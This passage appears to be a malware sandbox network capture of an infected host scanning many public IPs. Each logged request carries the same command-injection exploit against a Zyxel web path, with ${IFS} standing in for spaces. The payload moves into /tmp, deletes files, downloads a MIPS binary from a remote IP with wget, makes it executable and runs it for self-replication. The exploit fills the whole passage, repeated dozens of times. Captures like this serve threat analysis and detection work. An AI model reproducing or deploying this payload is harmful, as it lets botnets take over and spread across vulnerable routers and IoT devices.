                                                      Feb 2, 2024 06:36:07.956201077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8006192.168.2.1451962126.59.89.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956244946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8007192.168.2.144377437.144.131.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956265926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8008192.168.2.1446326152.72.2.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956331015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8009192.168.2.1437772167.113.99.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956360102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8010192.168.2.144896088.145.125.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956407070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8011192.168.2.1449530217.215.12.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956438065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8012192.168.2.1433596174.253.45.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956504107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8013192.168.2.144125642.20.52.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956522942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8014192.168.2.1434132150.138.251.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956573009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8015192.168.2.145370840.122.10.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956629992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8016192.168.2.1446966207.237.209.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956671000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8017192.168.2.143286670.177.134.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956685066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8018192.168.2.1440874125.162.165.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956743002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8019192.168.2.145636281.195.154.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956794977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8020192.168.2.144103898.69.237.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956820011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8021192.168.2.144188483.25.61.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956882000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8022192.168.2.1455056121.148.254.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956912041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8023192.168.2.1434418131.204.131.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956933022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8024192.168.2.143904460.81.101.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.956994057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8025192.168.2.1442228170.218.146.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957031012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8026192.168.2.1447252175.185.78.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957062006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8027192.168.2.143640242.62.210.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957084894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8028192.168.2.145299866.12.74.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957144022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8029192.168.2.1459304182.231.222.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957182884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8030192.168.2.1435922210.130.50.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957274914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8031192.168.2.1437570195.81.175.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957319975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8032192.168.2.145848076.233.22.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957345009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8033192.168.2.143579497.66.136.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957416058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8034192.168.2.144922818.32.3.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957449913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8035192.168.2.1445434156.15.153.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957489014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8036192.168.2.145156277.170.125.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957510948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8037192.168.2.1436186181.221.100.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957537889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8038192.168.2.1458492155.64.149.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957602024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8039192.168.2.1455418222.27.137.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957628012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8040192.168.2.143831857.218.220.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957679987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8041192.168.2.1446136132.145.244.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957729101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8042192.168.2.1434622148.171.122.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957771063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8043192.168.2.1456636177.179.169.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957817078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8044192.168.2.144733492.181.53.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957847118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8045192.168.2.1444124161.216.111.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957901001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8046192.168.2.1451590173.100.185.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957950115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8047192.168.2.1452552130.138.99.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.957995892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8048192.168.2.1439522161.244.87.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958022118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8049192.168.2.1459192124.83.86.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958086014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8050192.168.2.1458450188.193.205.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958110094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8051192.168.2.143323036.48.137.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958158970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8052192.168.2.143781891.23.113.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958204031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8053192.168.2.1436640155.144.6.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958256006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8054192.168.2.144004013.7.103.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958283901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8055192.168.2.1456312190.5.32.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958334923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8056192.168.2.145142232.27.19.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958386898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8057192.168.2.143387278.224.59.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958416939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8058192.168.2.1452000112.141.49.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958442926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8059192.168.2.144207271.119.222.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958492994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8060192.168.2.1444908110.111.195.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958540916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8061192.168.2.144519435.186.235.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958569050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8062192.168.2.1447236190.164.30.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958637953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8063192.168.2.145067254.206.155.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958663940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8064192.168.2.1442894150.74.205.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958689928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8065192.168.2.1435934116.187.153.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958745003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8066192.168.2.1452482116.33.37.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958792925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8067192.168.2.1442812219.206.41.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.958823919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8068192.168.2.144807666.130.77.72443
                                                      TimestampBytes transferredDirectionData
